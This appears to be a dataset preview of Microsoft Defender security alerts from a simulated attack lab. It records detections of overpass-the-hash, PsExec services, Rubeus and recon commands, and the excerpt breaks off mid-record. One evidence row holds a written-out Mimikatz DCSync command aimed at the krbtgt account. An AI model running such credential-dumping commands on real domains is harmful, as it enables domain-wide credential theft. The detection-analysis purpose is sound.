alertId stringclasses 278 values | providerAlertId stringclasses 278 values | incidentId int64 486 989 ⌀ | serviceSource stringclasses 2 values | creationTime stringdate 2022-09-30 05:04:51 2023-01-24 06:03:50 ⌀ | lastUpdatedTime stringdate 2022-11-12 01:35:42 2023-01-24 06:05:47 ⌀ | resolvedTime stringclasses 23 values | firstActivity stringdate 2022-09-07 09:25:00 2023-01-24 05:31:07 ⌀ | lastActivity stringdate 2022-09-30 05:00:00 2023-01-24 05:43:53 ⌀ | title stringclasses 62 values | description stringclasses 51 values | category stringclasses 12 values | status stringclasses 2 values | severity stringclasses 4 values | investigationId int64 20 64 ⌀ | investigationState stringclasses 9 values | classification stringclasses 1 value | determination stringclasses 1 value | detectionSource stringclasses 7 values | detectorId stringclasses 48 values | assignedTo stringclasses 3 values | actorName stringclasses 1 value | threatFamilyName stringclasses 6 values | mitreTechniques listlengths 0 8 ⌀ | devices listlengths 1 6 ⌀ | entities listlengths 0 49 ⌀ | entityType stringclasses 2 values | evidenceCreationTime stringclasses 469 values | verdict stringclasses 5 values | remediationStatus stringclasses 2 values | accountName stringclasses 30 values | domainName stringclasses 17 values | userSid stringclasses 22 values | aadUserId stringclasses 8 values | userPrincipalName stringclasses 14 values | sha1 stringclasses 28 values | sha256 stringclasses 27 values | fileName stringclasses 21 values | filePath stringclasses 13 values | processId int64 0 20.7k ⌀ | processCommandLine stringclasses 67 values | processCreationTime stringclasses 133 values | parentProcessId int64 0 14.6k ⌀ | parentProcessCreationTime stringclasses 63 values | parentProcessFileName stringclasses 14 values | parentProcessFilePath stringclasses 11 values | detectionStatus stringclasses 1 value | deviceId stringclasses 9 values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:28:43.7466667Z | Suspicious | None | null | null | null | null | null | null | null | null | null | 0 | whoami /all | 0001-01-01T00:00:00Z | 0 | 0001-01-01T00:00:00Z | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:15:08.81Z | Malicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T21:05:41.8233333Z | Suspicious | None | darol | test.domain | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:07:32.1166667Z | Suspicious | None | guest | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:17:48.9433333Z | Suspicious | None | ronhd | rnd.local | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:48:29.9566667Z | Suspicious | None | hacker | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:51:30.1466667Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d | 8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b | explorer.exe | C:\Windows | 1,896 | type secret.txt | 2022-12-22T08:26:24.0772409Z | 2,796 | 2022-12-22T08:26:23.9030784Z | userinit.exe | C:\Windows\System32 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
aad5c5735b-8f7f-407f-acfd-2d706c7db616 | d5c5735b-8f7f-407f-acfd-2d706c7db616 | 741 | MicrosoftDefenderForIdentity | 2022-11-18T05:12:07.4139838Z | 2022-11-19T01:39:23.53Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:08:44.778634Z | 2022-11-18T05:08:49.903208Z | Suspected overpass-the-hash attack (Kerberos) | Ron Henderson (Helpdesk Administrator) on MSDXV2-Win10V successfully authenticated against MSDXV2-DC. | DefenseEvasion | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | AzureATP | AbnormalKerberosOverpassTheHashSecurityAlert | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1550",
"T1550.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
},
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:12:07.6266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:11:51.33Z | Suspicious | None | steve | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | ded8fd7f36417f66eb6ada10e0c0d7c0022986e9 | bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527 | cmd.exe | C:\Windows\System32 | 3,020 | ipconfig | 2022-11-21T02:07:15.6313121Z | 7,232 | 2022-11-21T02:07:15.1389846Z | PSEXESVC.exe | C:\Windows | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T10:47:25.4533333Z | Unknown | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:36:07.8466667Z | Suspicious | None | steve | internal.corp | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:59:19.0966667Z | Benign | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,932 | "mimikatz.exe" "lsadump::dcsync /domain:msdxv8.m365dpoc.com /user:krbtgt" exit | 2022-12-22T08:47:53.5760604Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:19:39.1366667Z | Suspicious | Active | ronhd | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | fc870d086c53ded2e94300f7569aa9478186f2c7 | a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1 | Rubeus.exe | C:\Temp | 2,896 | whoami /all | 2022-11-11T08:17:34.5819675Z | 4,676 | 2022-11-11T08:17:34.5416431Z | cmd.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:14:52.3Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 7,588 | type secret.txt | 2022-09-30T06:11:51.8945322Z | 4,064 | 2022-09-30T06:11:13.210308Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638045930747994441_1210227961 | 95e31a58-67f4-46fc-b97b-22ec124abe7c | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:04:34.7994582Z | 2022-11-21T02:36:19.79Z | null | 2022-11-21T02:02:06.2897012Z | 2022-11-21T02:33:42.4743653Z | Suspicious service launched | A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device. | Execution | New | Medium | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | a5af9713-6eea-4d23-9bdc-9cab19f19092 | null | null | null | [
"T1569.002"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Low",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:02:06.2012631Z",
"processId": 7692,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.8433333Z",
"fileName": "services.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:18.9649669Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32",
"parentProcessId": 564,
"processCommandLine": "services.exe",
"processCreationTime": "2022-11-16T03:32:19.0279725Z",
"processId": 620,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "d7a213f3cfee2a8a191769eb33847953be51de54",
"sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.91Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:02:27.7361869Z",
"processId": 5760,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:15.0633333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:06:14.4989431Z",
"processId": 4572,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:09:15.2433333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:05:52.817905Z",
"processId": 7684,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:16:03Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:12:11.2117933Z",
"processId": 1984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:16:03.64Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:11:49.6251097Z",
"processId": 5300,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:33.69Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:14:30.1674201Z",
"processId": 9008,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:34.3766667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:14:08.7063722Z",
"processId": 5592,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:19:04.4966667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:16:27.1164549Z",
"processId": 7888,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:20:59.5533333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:16:05.8519522Z",
"processId": 6764,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:12.2066667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:22:22.878082Z",
"processId": 8064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:28:04.9Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:24:45.5696509Z",
"processId": 6984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:30.69Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:31:41.876943Z",
"processId": 9664,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:31.7733333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:31:20.3075634Z",
"processId": 456,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:18.9733333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:33:42.4457797Z",
"processId": 9656,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
